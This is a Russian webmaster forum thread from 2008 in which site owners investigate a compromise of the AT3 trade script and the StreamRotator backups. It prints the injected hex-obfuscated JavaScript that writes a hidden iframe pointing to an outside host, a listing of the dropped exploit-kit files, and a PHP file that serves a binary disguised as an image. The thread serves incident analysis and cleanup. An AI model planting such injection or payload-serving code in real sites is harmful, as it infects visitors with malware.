С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
Добавлено: 03/01/08 в 13:44 |
В общем ситуация такая же, как и в прошлые разы... backup.php появляется, меняется темплейт и несколько пхп файлов - вставляется кодированный ифрейм... на всех сиджах на серваке стоял 16-й билд под федору 5... фтп тока на мой айпи настроен, так что этот вариант исключается, ssh - тоже... x2.cgi не был заблочен, 12 обращений к нему в логах с айпи 195.5.116.250... сейчас x2.cgi заблочил, поглядим что будет...
ну и самое интересное... код ифрейма:
Код: | <script> var s='3C696672616D65207372633D22687474703A2F2F616D61746575727570736B697274732E696E666F2F73722F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
после перекодировки получаем:
Код: | <iframe src="http://amateurupskirts.info/sr/z/static.php" width=2 height=2 style="display:none"></iframe> |
сидж товарисча pns, который вот тут утверждает, что инфо домены лучче всех - Как народ относится к зоне .info?
по приведенному топику очень похоже на подставу, но чем черт не шутит... ... в общем очень бы хотелось услышать каментов от товарисча pns
|
|
|
|
С нами с 21.09.04
Сообщения: 609
Рейтинг: 473
|
Добавлено: 03/01/08 в 14:16 |
срочно разбираюсь..
....
первые итоги.
Этот "вирус" создаёт каталог с именем "z" в дире sr
и файлы backup.php backups.php в корне каталога sr .
Внутри z лежит следующее:
Код: | -rw-r--r-- 1 1879 May 11 2006 Installer.class
-rw-r--r-- 1 25681 May 11 2006 MagicApplet.class
-rw-r--r-- 1 8298 Oct 31 09:27 OP.jar
-rw-r--r-- 1 994 May 11 2006 OwnClassLoader.class
-rw-r--r-- 1 352 May 11 2006 ProxyClassLoader.class
-rw-r--r-- 1 31142 Jan 3 11:19 __ex.log
-rw-r--r-- 1 92202 Jan 3 11:19 __in.log
-rw-r--r-- 1 827 Oct 31 09:27 animan.class
drwxr-xr-x 3 4096 Nov 17 08:06 com
-rw-r--r-- 1 34049 Dec 29 10:59 ex.html
-rw-r--r-- 1 321 Dec 29 23:15 ex.php
-rw-r--r-- 1 14688 Oct 31 09:27 ms03011.jar
-rw-r--r-- 1 2407 Oct 31 09:27 omfg.class
-rw-r--r-- 1 38903 Jan 2 15:01 static.php
|
Полный код ex.php
Код: |
$size = filesize('ex.html');
header("Content-Length: $size");
header("Content-Type: image/gif");
$fp=fopen('ex.html','rb');
$var = fread($fp,filesize('ex.html'));
echo $var;
fclose($fp);
mylog('__ex.log','*');
exit;
function mylog($fname,$text)
{
$fp=fopen($fname,"a");
fwrite($fp,$text);
fclose($fp);
}
?>
|
В ex.html лежит бинарник под MSDOS -- это файл, видно, и выкачивают на комп юзера с зараженной веб-страницы.
Последний раз редактировалось: pns (03/01/08 в 14:32), всего редактировалось 1 раз
|
|
|
|
С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
Добавлено: 03/01/08 в 14:23 |
|
|
|
|
С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
Добавлено: 03/01/08 в 14:27 |
pns писал: | срочно разбираюсь.. |
ищи в логах домена обращения к x2.cgi
|
|
|
|
С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
Добавлено: 03/01/08 в 14:36 |
ну и кого ломали раньше, не поленитесь сделайте комманды
locate backup.php
locate static.php
потому как походу наличие файла backup.php позволяет ломать даже с заблоченым х2... да и кладет его пидарасина теперь не в корень...
|
|
|
|
С нами с 21.09.04
Сообщения: 609
Рейтинг: 473
|
Добавлено: 03/01/08 в 14:51 |
вот оно где зарыто!
конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов.
locate ничего не нашёл, зато поиск в mc выискал всех уродов.
StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted".
Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды.
Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную.
|
|
|
|
С нами с 06.11.06
Сообщения: 544
Рейтинг: 166
|
Добавлено: 03/01/08 в 15:08 |
Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно.
|
|
In the end, It doesn't even matter.
|
0
|
|
|
Хостинг, CDN
С нами с 23.12.04
Сообщения: 1259
Рейтинг: 1405
|
Добавлено: 03/01/08 в 15:09 |
|
|
|
|
С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950
|
Добавлено: 03/01/08 в 15:21 |
MaxLester писал: | Оффтоп: Гмм... господа at3 гавно скрипт, помоему это давно очевидно. |
Проблема в том, что это далеко не оффтоп.
|
|
|
|
С нами с 21.09.04
Сообщения: 609
Рейтинг: 473
|
Добавлено: 03/01/08 в 19:04 |
вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше.
уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.
вопрос не в конкретных дырах софта, а в тенденции.
Представим, что лёгкие дыры в ATL3/ATX закрыли. Куда хакеры двинуться? В сторону тех скриптов, которые сейчас на фоне AT выглядят "надёжными". И превратятся тогда "надёжные" в "гов#$%енные".
|
|
|
|
пьяный мастер
С нами с 06.09.05
Сообщения: 11947
Рейтинг: 5837
|
Добавлено: 03/01/08 в 19:21 |
Цитата: | Тема: Похоже, что 16-й билд ат3 такой же дырявый... :( |
я как юзал билд 10 (на многих сайтах) так и юзаю...... и похуй мне на всех хакеров... сломать могут любого лишбы желание было :)
|
|
|
|
С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950
|
Добавлено: 03/01/08 в 21:50 |
pns писал: | вот тебе оффтоп: microsoft windows дыряв сколько уже десятков лет, как минное поле в войну, но юзали, юзают и будут юзать и дальше.
уже сколько раз сказано: массово популярный софт в первую очередь подвежен хакингу.
|
Кто сказал, что бесполезно биться головой об стену ?
Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать.
Я бы вообще не преследовал хакеров. Если Ваш софт падает от "наездов" - виноват программер, а не кто-то ещё. Вся борьба с хакерами адвертится и финансируется бездарями вроде микрософта, которые продают некачественный софт и пытаются переложить ответственность на кого-то.
|
|
|
|
С нами с 02.09.07
Сообщения: 96
Рейтинг: 115
|
Добавлено: 04/01/08 в 01:29 |
У меня тоже с 16 проблема. Прочитал тему и полез смотреть, вижу в sr папке backup.php который сканит все файлы, но на этом вроде все.
Взлом сегодня, судя по дате. Логов нет...
Блять, опять закрывать форму?
|
|
|
|
С нами с 11.06.03
Сообщения: 1266
Рейтинг: 950
|
Добавлено: 04/01/08 в 01:34 |
Кстати, если дело только в скрипте сабмита, то мож его просто переделать самим ? формат базы трейдеров известен ?
|
|
|
|
С нами с 02.09.07
Сообщения: 96
Рейтинг: 115
|
Добавлено: 04/01/08 в 01:43 |
Да, формат известен, все открыто. Надо посмотреть, реально ли это
|
|
|
|
С нами с 02.09.07
Сообщения: 96
Рейтинг: 115
|
Добавлено: 04/01/08 в 01:52 |
У меня ссылка в iframe на такойже static.php только лежит он на 15den.com
|
|
|
|
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
Добавлено: 04/01/08 в 02:06 |
У меня осталось три копии ат3 и одна атх. Ничего не сломали слава яйцам. Хотя там htaccess были. Завтра встану и все переведу на другие скрипты. Как бы не хвалили его почитатели и не защищали, но настоебенило уже.
|
|
|
|
С нами с 05.02.07
Сообщения: 286
Рейтинг: 222
|
Добавлено: 04/01/08 в 03:10 |
Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин.
Для истериков:
pns писал: | вот оно где зарыто!
конечно: в корне все backup.php поудалял, а в бэкапах streamrotator они остались, да ещё в -цати экземплярах по числу бэкапов.
locate ничего не нашёл, зато поиск в mc выискал всех уродов.
StreamRotator в аминке в меню backup указывает на неверные бэкапы, как "corrupted".
Удобнее всего пройтись по админкам всех стримов и вручную удались все бэкапы за предыдущие периоды.
Потом убедиться в том, что *сейчас* в каталоге sr/ ничего чужеродного нет, и создать бэкап вручную. |
pns сам оставил дыру еще с прошлого раза.
|
|
|
|
С нами с 04.08.03
Сообщения: 343
Рейтинг: 127
|
Добавлено: 04/01/08 в 03:28 |
Sha писал: | Софт надо писать качественный. Тот кто считает, что это невозможно - просто не умеет этого делать. |
Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза.
|
|
|
|
С нами с 02.09.07
Сообщения: 96
Рейтинг: 115
|
Добавлено: 04/01/08 в 03:32 |
doomed писал: | Такое чуство что все превратились в амеров и читают в однозадачном режиме только последний пост. Глухой телефон блин.
pns сам оставил дыру еще с прошлого раза. |
Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;)
|
|
|
|
С нами с 05.02.07
Сообщения: 286
Рейтинг: 222
|
Добавлено: 04/01/08 в 04:01 |
sir.korvin писал: | Тоесть, меня, тупого амера, сломали из-за того что pns оставил у себя в бэкапах эксп? ;) |
Сдесь где-то есть упоминание тебя?
А уж почему тебя сломали - это к телепатам, от тебя никакой информации "почему, как и когда" пока не вижу (как и от Doctor впрочем, кроме той, что его опять сломали).
|
|
|
|
саблезубый кролик
С нами с 02.07.05
Сообщения: 2966
Рейтинг: 993
|
Добавлено: 04/01/08 в 04:30 |
Twich писал: | Ты бредишь - ломается все, а то что особенно актуально ломается очень, очень быстро. Разуй глаза. |
И нормальную валидацию форм сделать тяжело уже после первого взлома? То что там с тире так это вообще маразм.
|
|
|
|
С нами с 28.01.06
Сообщения: 380
Рейтинг: 588
|
Добавлено: 04/01/08 в 10:18 |
А никто не заметил что у всех кого поламали стоит стрим ротатор?
Так что может не туда капаем а?
|
|
|
|
Любитель хорошего ;)
С нами с 08.06.07
Сообщения: 16151
Рейтинг: 6269
|
Добавлено: 04/01/08 в 10:55 |
Но запросы шли на файлы at3 а не стрима.
|
|
|
|
С нами с 15.08.07
Сообщения: 203
Рейтинг: 321
|
Добавлено: 04/01/08 в 10:59 |
а чего стоит, заменить фаил at (через стрим) и потом его запрашивать, что бы было без палева?
|
|
|
|